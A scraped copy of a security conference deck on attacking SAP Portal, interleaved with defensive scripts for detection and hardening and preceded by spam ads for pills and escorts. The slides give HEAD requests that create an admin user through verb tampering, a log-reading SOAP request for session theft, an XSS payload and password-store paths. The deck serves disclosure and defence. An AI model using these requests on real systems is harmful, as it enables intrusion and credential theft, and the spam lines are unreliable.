Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 

Breaking SAP portal (HashDays)

  • 1. Invest in security to secure investments
    Breaking SAP Portal
    Alexander Polyakov, CTO ERPScan

  • 2. About ERPScan
    •  The only 360-degree SAP Security solution: ERPScan Security Monitoring Suite for SAP
    •  Leader by the number of acknowledgements from SAP (150+)
    •  60+ presentations at key security conferences worldwide
    •  25 awards and nominations
    •  Research team: 20 experts with experience in different areas of security
    •  Headquarters in Palo Alto (US) and Amsterdam (EU)

  • 3. Agenda
    •  Say hello to SAP Portal
    •  Breaking Portal through SAP Services
    •  Breaking Portal through J2EE Engine
    •  Breaking Portal through Portal issues
    •  ERPScan SAP Pentesting Tool password decrypt module
    •  Conclusion

  • 4. SAP
    •  The most popular business application
    •  More than 180000 customers worldwide
    •  74% of Forbes 500 run SAP

  • 6. Say hello to Portal
    •  Point of web access to SAP systems
    •  Point of web access to other corporate systems
    •  Way for attackers to get access to SAP from the Internet
    •  ~17 Portals in Switzerland, according to Shodan
    •  ~11 Portals in Switzerland, according to Google

  • 8. Okay, okay. SAP Portal is important, and it has many links to other modules. So what?

  • 10. SAP Management Console
    •  SAP MC provides a common framework for centralized system management
    •  It allows seeing the trace and log messages
    •  Using a JSESSIONID from the logs, an attacker can log into Portal
    What can we find in the logs? Right! The file userinterface.log contains the calculated JSESSIONID.
    But... the attacker must have credentials to read the log file! Wrong!

  • 11. SAP Management Console
    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Header>
        <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
          <enableSession>true</enableSession>
        </sapsess:Session>
      </SOAP-ENV:Header>
      <SOAP-ENV:Body>
        <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
          <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
          <filter/>
          <language/>
          <maxentries>%COUNT%</maxentries>
          <statecookie>EOF</statecookie>
        </ns1:ReadLogFile>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

  • 12. Prevention
    Don't use TRACE_LEVEL = 3 in production systems, or delete the traces
    http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
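The check a defender wants after slides 10 to 12 is whether exported trace logs actually carry session cookies. The script below is an added example, not code from the deck, from ERPScan or from SAP: it scans log lines for JSESSIONID values, reports where they occur and produces a redacted copy. The sample log lines are constructed for this example and do not reproduce SAP's real log format.

```python
"""Find session identifiers leaked into J2EE trace/log output.

Added example, not from the ERPScan deck or SAP: userinterface.log written at
TRACE_LEVEL 3 contains JSESSIONID values, so a defender should check exported
logs for session tokens before accepting a trace level in production.  The
log lines below are constructed and do not reproduce SAP's real log format.
"""
import re

# JSESSIONID=<value>; the value class covers the base64-like characters the
# cookie uses plus '_', '-', '!', '*' and '.'; it stops at ';' or whitespace.
_SESSION_RE = re.compile(r"JSESSIONID=([A-Za-z0-9_\-+/=!*.]+)", re.IGNORECASE)


def find_session_id_leaks(lines):
    """Return {line_number: session_id} for every line exposing a session id."""
    leaks = {}
    for lineno, line in enumerate(lines, start=1):
        match = _SESSION_RE.search(line)
        if match:
            leaks[lineno] = match.group(1)
    return leaks


def redact_session_ids(lines):
    """Copy of the lines with session id values masked, so the log can be
    handed to support or archived without exposing live sessions."""
    return [_SESSION_RE.sub("JSESSIONID=<redacted>", line) for line in lines]


# Constructed sample: lines 1 and 3 carry a session cookie, line 2 does not.
SAMPLE_LOG = [
    "#1.5#2012 10 31 12:00:01#Cookie: JSESSIONID=AbC123xyzSample!1234567890; saplb_*=(J2EE1234567)",
    "#1.5#2012 10 31 12:00:02#User admin logged on from 10.0.0.5",
    "#1.5#2012 10 31 12:00:03#Request headers: Host=portal.example.test, JSESSIONID=second_Sample_value",
]


def leak_report(lines=SAMPLE_LOG):
    """Summarise leaks as (count, sorted affected line numbers)."""
    leaks = find_session_id_leaks(lines)
    return len(leaks), sorted(leaks)


if __name__ == "__main__":
    count, where = leak_report()
    print("session ids found: %d on lines %s" % (count, where))
    for line in redact_session_ids(SAMPLE_LOG):
        print(line)
```

Run it over a log exported from a production system: any hit means the trace level is leaking credentials-equivalent material and the log must be treated as sensitive until the trace level is lowered and the file is removed.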
  • 14. SSO (old but still works)
    •  SAP implements SSO using the Header Variable Login Module
    (diagram labels: credentials, check, okay, cookie; Attacker, header_auth, cookie)
    thx Mariano ;)

  • 15. Prevention
    •  Implement proper network filters to avoid direct connections to the SAP J2EE Engine
    •  If you use it for Windows authentication, switch to SPNegoLoginModule
    http://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c2653126e10000000a1550b0/frameset.htm
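The weakness on slide 14 is that the engine trusts a header variable no matter who sent it. The example below is added here and is not SAP or ERPScan code: it shows the two controls behind the prevention slide in code, a reverse proxy that drops any client-supplied copy of the identity header before asserting its own, and an engine-side guard that honours the header only from the proxy's address range. The header name "header_auth", the 10.0.1.0/24 range and the user names are placeholders assumed for the example.

```python
"""Header-variable SSO: only the trusted proxy may assert the identity header.

Added example, not SAP or ERPScan code.  Assumptions: the SSO header is
named "header_auth", the reverse proxies live in 10.0.1.0/24, and user
names are placeholders.
"""
import ipaddress

TRUSTED_HEADER = "header_auth"                               # assumed header variable name
TRUSTED_PROXY_NETS = [ipaddress.ip_network("10.0.1.0/24")]   # assumed proxy addresses


def proxy_forward_headers(client_headers, authenticated_user):
    """Headers a reverse proxy forwards to the engine.

    Every inbound header whose name matches the trusted one is discarded
    (case-insensitively), and the value is set only from the identity the
    proxy itself authenticated; None means the client stays anonymous.
    """
    forwarded = {name: value for name, value in client_headers.items()
                 if name.lower() != TRUSTED_HEADER}
    if authenticated_user is not None:
        forwarded[TRUSTED_HEADER] = authenticated_user
    return forwarded


def engine_accept_header(remote_addr, headers):
    """Engine-side guard: return the asserted user only when the request came
    from a trusted proxy address, otherwise None (normal login applies)."""
    addr = ipaddress.ip_address(remote_addr)
    if not any(addr in net for net in TRUSTED_PROXY_NETS):
        return None
    for name, value in headers.items():
        if name.lower() == TRUSTED_HEADER:
            return value
    return None


def request_via_proxy(client_headers, proxy_user, proxy_addr="10.0.1.5"):
    """Client -> proxy -> engine: the proxy rewrites the headers and the
    engine sees the proxy's address."""
    return engine_accept_header(proxy_addr, proxy_forward_headers(client_headers, proxy_user))


def request_direct(client_addr, client_headers):
    """Client -> engine with no proxy in between: the header is ignored
    unless the source address itself is a trusted proxy."""
    return engine_accept_header(client_addr, client_headers)


if __name__ == "__main__":
    print("via proxy, client claims admin, proxy authenticated alice:",
          request_via_proxy({"Header_Auth": "admin"}, "alice"))
    print("direct to engine from the Internet:",
          request_direct("203.0.113.9", {"header_auth": "admin"}))
```

The address check is the code equivalent of the network filter on slide 15; without it the proxy-side sanitising does nothing for a client that can reach the engine port directly.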
  • 17. Access control
    Web Dynpro     - programmatic
    Portal iViews  - programmatic
    J2EE Web apps  - declarative
    Programmatic: by UME
    Declarative: by WEB.XML

  • 18. Declarative access control
    •  The central entity in the J2EE authorization model is the security role.
    •  Programmers define the application-specific roles in the J2EE deployment descriptors web.xml and web-j2ee-engine.xml

  • 20. web.xml
    <servlet>
      <servlet-name>CriticalAction</servlet-name>
      <servlet-class>com.sap.admin.Critical.Action</servlet-class>
    </servlet>
    <servlet-mapping>
      <servlet-name>CriticalAction</servlet-name>
      <url-pattern>/admin/critical</url-pattern>
    </servlet-mapping>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>administrator</role-name>
      </auth-constraint>
    </security-constraint>

  • 21. Verb Tampering
    •  If we try to get access to an application using GET, we need a login:pass and the administrator role
    •  What if we try to get access to the application using HEAD instead of GET?
    •  PROFIT!
    •  Did U know about ctc?

  • 22. Verb Tampering
    Need an Admin account in SAP Portal? Just send two HEAD requests
    •  Create new user blabla:blabla
       HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
    •  Add user blabla to group Administrators
       HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
    Works when UME uses the JAVA database

  • 23. Prevention
    •  Install SAP notes 1503579, 1616259
    •  Install other SAP notes about Verb Tampering
    •  Scan applications with ERPScan WEB.XML checker
    •  Disable the applications that are not necessary

  • 25. web.xml
    <servlet>
      <servlet-name>CriticalAction</servlet-name>
      <servlet-class>com.sap.admin.Critical.Action</servlet-class>
    </servlet>
    <servlet-mapping>
      <servlet-name>CriticalAction</servlet-name>
      <url-pattern>/admin/critical</url-pattern>
    </servlet-mapping>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
        <http-method>HEAD</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>administrator</role-name>
      </auth-constraint>
    </security-constraint>
    GET /admin/critical/CriticalAction
    GET /servlet/com.sap.admin.Critical.Action
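Slide 23 recommends scanning every web.xml. The script below is an added example, not ERPScan's WEB.XML checker and not SAP code: it parses a deployment descriptor and flags every security-constraint that enumerates HTTP methods, because such a constraint protects only the listed verbs. Adding HEAD next to GET, as slide 25 does, still leaves POST, PUT and the others open; removing the http-method elements altogether applies the constraint to every verb, which is what the hardening function produces. The descriptor is constructed from slide 20 and is not a real SAP file; note that the /servlet/<class> path from slide 25 bypasses the url-pattern entirely and is a separate engine setting (slide 28).

```python
"""Audit web.xml security constraints for verb tampering.

Added example, not ERPScan's WEB.XML checker and not SAP code.  A
<security-constraint> that lists <http-method> elements protects only
those verbs; omitting <http-method> applies the constraint to all verbs.
The sample descriptor is constructed from the deck's slide 20.
"""
import xml.etree.ElementTree as ET

COMMON_METHODS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"]


def _local(tag):
    """Strip a namespace such as {http://java.sun.com/xml/ns/j2ee} from a tag."""
    return tag.rsplit("}", 1)[-1]


def _texts(elem, name):
    """Text of every descendant of elem whose local tag name is `name`."""
    return [c.text.strip() for c in elem.iter() if _local(c.tag) == name and c.text]


def audit_web_xml(xml_text):
    """Findings (url_patterns, constrained_methods, roles, unprotected_methods)
    for each constraint that enumerates HTTP methods."""
    root = ET.fromstring(xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        patterns, methods, roles = [], [], []
        for child in sc:
            if _local(child.tag) == "web-resource-collection":
                patterns += _texts(child, "url-pattern")
                methods += _texts(child, "http-method")
            elif _local(child.tag) == "auth-constraint":
                roles += _texts(child, "role-name")
        if methods:  # an enumerated list leaves every other verb unconstrained
            methods = sorted({m.upper() for m in methods})
            unprotected = sorted(set(COMMON_METHODS) - set(methods))
            findings.append((patterns, methods, roles, unprotected))
    return findings


def strip_http_methods(xml_text):
    """Hardened copy of the descriptor: remove <http-method> from every
    web-resource-collection so the constraint covers all verbs."""
    root = ET.fromstring(xml_text)
    collections = [e for e in root.iter() if _local(e.tag) == "web-resource-collection"]
    for wrc in collections:
        for child in list(wrc):
            if _local(child.tag) == "http-method":
                wrc.remove(child)
    return ET.tostring(root, encoding="unicode")


# Constructed from slide 20 of the deck; not a real SAP descriptor.
SAMPLE_WEB_XML = """<?xml version="1.0"?>
<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

if __name__ == "__main__":
    for patterns, methods, roles, unprotected in audit_web_xml(SAMPLE_WEB_XML):
        print("%s: role %s enforced only for %s; open for %s"
              % (patterns, roles, methods, unprotected))
    print("after fix:", audit_web_xml(strip_http_methods(SAMPLE_WEB_XML)))
```

Point the auditor at every web.xml extracted from deployed applications; a non-empty result for an administrative url-pattern is a verb-tampering exposure regardless of which SAP notes are installed.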
  • 26. Invoker Servlet
    •  Want to execute an OS command on the J2EE server remotely?
    •  Maybe upload a backdoor in a Java class?
    •  Or sniff all traffic?
    Still remember ctc?

  • 28. Prevention
    •  Update to the latest patch: 1467771, 1445998
    •  "EnableInvokerServletGlobally" must be "false"
    •  Check all WEB.XML files with ERPScan WEBXML checker

  • 29. So, where is Portal?

  • 30. SAP Portal
    •  User access rights to objects are in the Portal Content Directory (PCD)
    •  Based on ACL
    •  2 types of access:
       –  (design time) for administrators
       –  (runtime) for users

  • 31. Portal Permission Levels

  • 32. End User permission
    The objects where end user permission is enabled affect the following areas in Portal:
    –  All Portal Catalog objects with end user permission
    –  Authorized Portal users may access restricted Portal components by URL without an intermediate iView if they are granted permission in the appropriate security zone.

  • 33. Administrator permission
    •  Owner = full control + modify permissions
    •  Full control = read/write + delete object
    •  Read/Write = read + write + edit properties + add/remove child
    •  Write (folders only) = create objects
    •  Read = view object + create instances (delta links and copies)
    •  None = access not granted

  • 34. Role Assigner permission
    •  The Role Assigner permission setting is available for role objects
    •  It allows you to determine which Portal users are permitted to assign other users, groups, or roles to the role principal using the Role Assignment tool

  • 35. Security Zones
    •  Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch
    •  A security zone specifies the vendor ID, the security area, and the safety level for each Portal component and Portal service
    •  The security zone is defined in a Portal application descriptor XML file
    •  A Portal component or service can only belong to one security zone; however, Portal components and services may share the same safety level
    •  Zones allow the administrator to assign permissions to a safety level instead of assigning them directly to each Portal component or service
    Why? To group multiple iViews easily

  • 36. We can get access to Portal iViews using a direct URL:
    /irj/servlet/prt/portal/prtroot/<iView_ID>
    And only Security Zone rights will be checked

  • 37. Security Zones
    •  So, SecZones offer an extra, but optional, layer of code-level security for iViews
       –  User -> check "end user" permission on the role -> view iView
       –  User -> check "end user" permission on the role -> check "end user" permission on the SecZone -> view iView
    By default, this functionality is disabled

  • 38. So I wonder how many Portal applications with No/Low Safety exist?

  • 39. Safety Levels for Security Zone
    •  No Safety
       –  Anonymous users are permitted to access portal components defined in the security zone.
    •  Low Safety
       –  A user must be at least an authenticated portal user to access portal components defined in the security zone.
    •  Medium Safety
       –  A user must be assigned to a particular portal role that is authorized to access portal components defined in the security zone.
    •  High Safety
       –  A user must be assigned to a portal role with higher administrative rights that is authorized to access portal components defined in the security zone.

  • 40. No safety zone
    Many custom applications with a low security level zone

  • 41. Prevention
    Check security zone permissions
    •  http://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm
    •  http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm
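Slide 38 asks how many Portal applications sit in a No Safety or Low Safety zone, and slide 41 tells administrators to check zone permissions. The script below is an added example, not SAP or ERPScan code: it reads a portal application descriptor and lists every component or service whose SecurityZone property ends in no_safety or low_safety, or that declares no zone at all. The descriptor layout it assumes (component and service elements carrying a property named SecurityZone whose value ends with the safety level) and the sample file are assumptions made for this example, so verify them against your own portalapp.xml before relying on the output.

```python
"""List Portal components and services whose security zone is weak or unset.

Added example, not SAP or ERPScan code.  Assumption: the descriptor uses
<component name=".."> / <service name=".."> elements with a
<property name="SecurityZone" value="vendor.zone/<level>"/> child, where
<level> is no_safety, low_safety, medium_safety or high_safety.
"""
import xml.etree.ElementTree as ET

WEAK_LEVELS = {"no_safety", "low_safety"}


def security_zone_findings(portalapp_xml):
    """Return [(kind, name, zone, level)] for components/services needing review:
    weak safety levels and entries with no SecurityZone property at all."""
    root = ET.fromstring(portalapp_xml)
    findings = []
    for kind in ("component", "service"):
        for elem in root.iter(kind):
            zone = None
            for prop in elem.iter("property"):
                if prop.get("name") == "SecurityZone":
                    zone = prop.get("value")
            # The safety level is the last path segment of the zone value.
            level = zone.rsplit("/", 1)[-1].lower() if zone else "unset"
            if level in WEAK_LEVELS or level == "unset":
                findings.append((kind, elem.get("name", "?"), zone, level))
    return findings


def count_by_level(findings):
    """Tally findings per safety level for a one-line summary."""
    counts = {}
    for _, _, _, level in findings:
        counts[level] = counts.get(level, 0) + 1
    return counts


# Constructed sample descriptor (not from any SAP application).
SAMPLE_PORTALAPP = """<?xml version="1.0"?>
<application>
  <components>
    <component name="PublicView">
      <component-config>
        <property name="ClassName" value="com.example.PublicView"/>
        <property name="SecurityZone" value="com.example.portal/no_safety"/>
      </component-config>
    </component>
    <component name="AdminView">
      <component-config>
        <property name="SecurityZone" value="com.example.portal/high_safety"/>
      </component-config>
    </component>
    <component name="LegacyView">
      <component-config>
        <property name="ClassName" value="com.example.LegacyView"/>
      </component-config>
    </component>
  </components>
  <services>
    <service name="ReportService">
      <service-config>
        <property name="SecurityZone" value="com.example.portal/low_safety"/>
      </service-config>
    </service>
  </services>
</application>
"""

if __name__ == "__main__":
    found = security_zone_findings(SAMPLE_PORTALAPP)
    for kind, name, zone, level in found:
        print("%-9s %-14s %-10s %s" % (kind, name, level, zone))
    print(count_by_level(found))
```

Every entry reported as no_safety is reachable anonymously through the direct prtroot URL on slide 36, and every unset entry needs its effective default looked up rather than assumed.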
  • 42. SAP Portal
    •  Web based services
    •  All of the OWASP TOP 10 are relevant:
       –  XSS
       –  Phishing
       –  Traversal
       –  XXE
       –  ...

  • 44. XSS
    •  Many XSSs in Portal
    •  But sometimes "httponly"
    •  But when we exploit XSS, we can use the features of SAP Portal

  • 45. <SCRIPT>
      alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
    </SCRIPT>

  • 46. EPCF
    EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
    •  Enterprise Portal Client Manager (EPCM)
    •  iViews can access the EPCM object from every portal page or IFrame
    •  Every iView contains the EPCM object
    •  For example, EPCF is used as a transient user data buffer for iViews

  • 47. Prevention
    Install SAP note 1656549

  • 48. KM Phishing
    SAP Knowledge Management may be used to create phishing pages

  • 51. Directory traversal fix bypass

  • 52. Prevention
    Install SAP note 1630293

  • 53. Cut the Crap, Show Me the Hack

  • 54. Breaking SAP Portal
    •  Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
    •  Found a file in the OS of SAP Portal with the keys to decrypt the passwords
    •  Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
    •  Decrypt the passwords and log into Portal
    •  PROFIT!

  • 55. Read file
    How can we read the file?
    –  Directory Traversal
    –  OS Command execution
    –  XML External Entity (XXE)

  • 56. XXE in Portal

  • 57. XXE in Portal

  • 58. XXE
    Error based XXE
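Slides 55 to 58 use an XXE in a Portal endpoint to read files. A defence that holds regardless of how the application's own XML parser is configured is to refuse client-supplied documents that declare a DOCTYPE at all, since external entity attacks need one. The gate below is an added example and is not SAP code; it uses expat's DOCTYPE callback, which fires before any entity is resolved, and the sample documents are constructed for the example.

```python
"""Refuse XML that declares a DTD before it reaches an entity-resolving parser.

Added example, not SAP code.  External entity attacks require a DOCTYPE
with an entity declaration, so rejecting any document that carries a
DOCTYPE removes the precondition.  Sample documents are constructed.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


def has_dtd(xml_bytes):
    """True when the document declares a DOCTYPE (internal or external subset).

    expat invokes StartDoctypeDeclHandler before resolving anything, so the
    flag is set even if parsing fails later on the rest of the document.
    """
    seen = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: seen.append(name))
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input is rejected by the caller anyway
    return bool(seen)


def parse_untrusted(xml_bytes):
    """Parse client-supplied XML only when it carries no DTD; raise otherwise."""
    if has_dtd(xml_bytes):
        raise ValueError("DOCTYPE/entity declarations are not accepted from clients")
    return ET.fromstring(xml_bytes)


def rejects(xml_bytes):
    """True if parse_untrusted refuses the document."""
    try:
        parse_untrusted(xml_bytes)
    except ValueError:
        return True
    return False


# Constructed samples: a plain request, one referencing an external subset,
# and one declaring an internal entity.  Both DTD variants must be refused.
CLEAN = b'<?xml version="1.0"?><request><id>42</id></request>'
EXTERNAL_SUBSET = (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE request SYSTEM "http://dtd.example.invalid/request.dtd">'
                   b'<request><id>42</id></request>')
INTERNAL_ENTITY = (b'<?xml version="1.0"?>'
                   b'<!DOCTYPE request [<!ENTITY greeting "hello">]>'
                   b'<request>&greeting;</request>')


def gate_results():
    """has_dtd for each sample, in the order CLEAN, EXTERNAL_SUBSET, INTERNAL_ENTITY."""
    return tuple(has_dtd(doc) for doc in (CLEAN, EXTERNAL_SUBSET, INTERNAL_ENTITY))


if __name__ == "__main__":
    print("DTD present:", gate_results())
    print("parsed id:", parse_untrusted(CLEAN).find("id").text)
```

Placing this gate at the edge (a reverse proxy or a servlet filter in front of the vulnerable endpoint) is a compensating control while the SAP note is being applied; it does not replace the patch, because the underlying parser still resolves entities for any path that bypasses the gate.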
  • 59. Breaking SAP Portal
    •  Ok, we can read files
    •  Where are the passwords?
    •  The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
       \usr\sap\<SID>\SYS\global\security\data\SecStore.properties

  • 60. Where are the passwords? (config.properties)
    rdbms.maximum_connections=5
    system.name=TTT
    secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
    secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
    secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
    rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
    rdbms.connection=jdbc/pool/TTT
    rdbms.initial_connections=1

  • 61. Where are the passwords? (config.properties)
    rdbms.maximum_connections=5
    system.name=TTT
    secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
    secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
    secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
    rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
    rdbms.connection=jdbc/pool/TTT
    rdbms.initial_connections=1

  • 62. But where is the key?

  • 63. SecStore.properties
    $internal/version=Ni4zFF4wMSeaseforCCMxegAfx
    admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
    admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
    jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
    admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
    $internal/check=BJRrz€eUA+bw4XCzdz16zX78u•t
    $internal/mode=encrypted
    admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E

  • 64. config.properties
    rdbms.maximum_connections=5
    system.name=TTT
    secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
    secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
    secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
    rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
    rdbms.connection=jdbc/pool/TTT
    rdbms.initial_connections=1

  • 65. Get the password
    •  We have an encrypted password
    •  We have a key to decrypt it
    We got the J2EE admin and JDBC login:password!

  • 66. Prevention
    •  Install SAP note 1619539
    •  Restrict read access to the files SecStore.properties and SecStore.key
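The second item on slide 66, restricting read access to SecStore.properties and SecStore.key, is easy to verify and easy to regress. The script below is an added example, not SAP or ERPScan code: it audits both files for group or world read/write bits and, optionally, for an unexpected owner, using POSIX mode bits. The directory layout, the owner and the temporary files created by the demo are assumptions for the example; on a real system point it at the security/data directory from config.properties and pass the uid of the SAP service account.

```python
"""Check that the secure-store files are readable only by their owner.

Added example, not SAP or ERPScan code.  Assumptions: POSIX permissions,
the two file names from the deck, and (in demo()) temporary placeholder
files with constructed content instead of real secure-store data.
"""
import os
import stat
import tempfile

SECSTORE_FILES = ("SecStore.properties", "SecStore.key")


def permission_findings(path, expected_uid=None):
    """List of problems with one file's mode and owner; empty means fine."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("readable by group or others (mode %o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or others (mode %o)" % mode)
    if expected_uid is not None and st.st_uid != expected_uid:
        findings.append("owned by uid %d, expected %d" % (st.st_uid, expected_uid))
    return findings


def audit_secstore(security_data_dir, expected_uid=None):
    """Audit SecStore.properties and SecStore.key in a directory.

    Returns {file_name: findings}; a missing file is reported as such so
    a typo in the path is not mistaken for a clean result.
    """
    report = {}
    for name in SECSTORE_FILES:
        path = os.path.join(security_data_dir, name)
        if not os.path.exists(path):
            report[name] = ["missing"]
            continue
        report[name] = permission_findings(path, expected_uid)
    return report


def demo():
    """Build a temporary copy of the layout with one weak and one correct file."""
    directory = tempfile.mkdtemp()
    weak = os.path.join(directory, "SecStore.properties")
    good = os.path.join(directory, "SecStore.key")
    with open(weak, "w") as fh:
        fh.write("$internal/mode=encrypted\n")   # constructed placeholder content
    with open(good, "w") as fh:
        fh.write("placeholder-key-material\n")    # constructed placeholder content
    os.chmod(weak, 0o644)   # the misconfiguration slide 66 warns about
    os.chmod(good, 0o600)   # owner-only access
    return audit_secstore(directory, os.getuid())


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "ok")
```

Run this from a cron job or a configuration-management check; since the files hold the keys to the administrator and JDBC credentials, any finding should page the same people a failed login audit would.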
  • 67. Portal post exploitation
    •  Lots of links to other systems in the corporate LAN
    •  Using SSRF, attackers can get access to these systems
    What is SSRF?

  • 68. SSRF History: Basics
    •  We send Packet A to Service A
    •  Service A initiates Packet B to Service B
    •  Services can be on the same or different hosts
    •  We can manipulate some fields of Packet B within Packet A
    •  Various SSRF attacks depend on how many fields we can control in Packet B
    (diagram labels: Packet A, Packet B)

  • 69. Partial Remote SSRF: HTTP attacks on other services
    (diagram labels: HTTP Server, Corporate network, Direct attack: GET /vuln.jsp, SSRF Attack, SSRF Attack: Get /vuln.jst, A, B)

  • 70. Gopher URI scheme
    •  Using the gopher:// URI scheme, it is possible to send TCP packets
       –  Exploit OS vulnerabilities
       –  Exploit old SAP application vulnerabilities
       –  Bypass SAP security restrictions
       –  Exploit vulnerabilities in local services
    More info in our BH2012 presentation: SSRF vs. Business Critical Applications
    http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
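Slides 67 to 70 describe the Portal relaying requests into the corporate LAN, including gopher:// to reach raw TCP services. The guard below is an added example and is not SAP or ERPScan code: it validates a URL before a server-side component fetches it, allowing only http and https, refusing embedded credentials, resolving the host and rejecting any address that is not globally routable (loopback, RFC 1918, link-local). The host names and the fake DNS table are assumptions so the example runs offline.

```python
"""Validate a URL before a Portal component fetches it on a user's behalf.

Added example, not SAP or ERPScan code.  Assumptions: the allow-list of
schemes below, and a constructed DNS table for offline use.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host):
    """Every address a host name resolves to (real DNS; the default resolver)."""
    return [ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)]


def is_safe_outbound_url(url, resolver=resolve_all):
    """Return (ok, reason).  Every resolved address must be globally routable,
    so a name that maps to 10.x or 127.x is refused, not only IP literals."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
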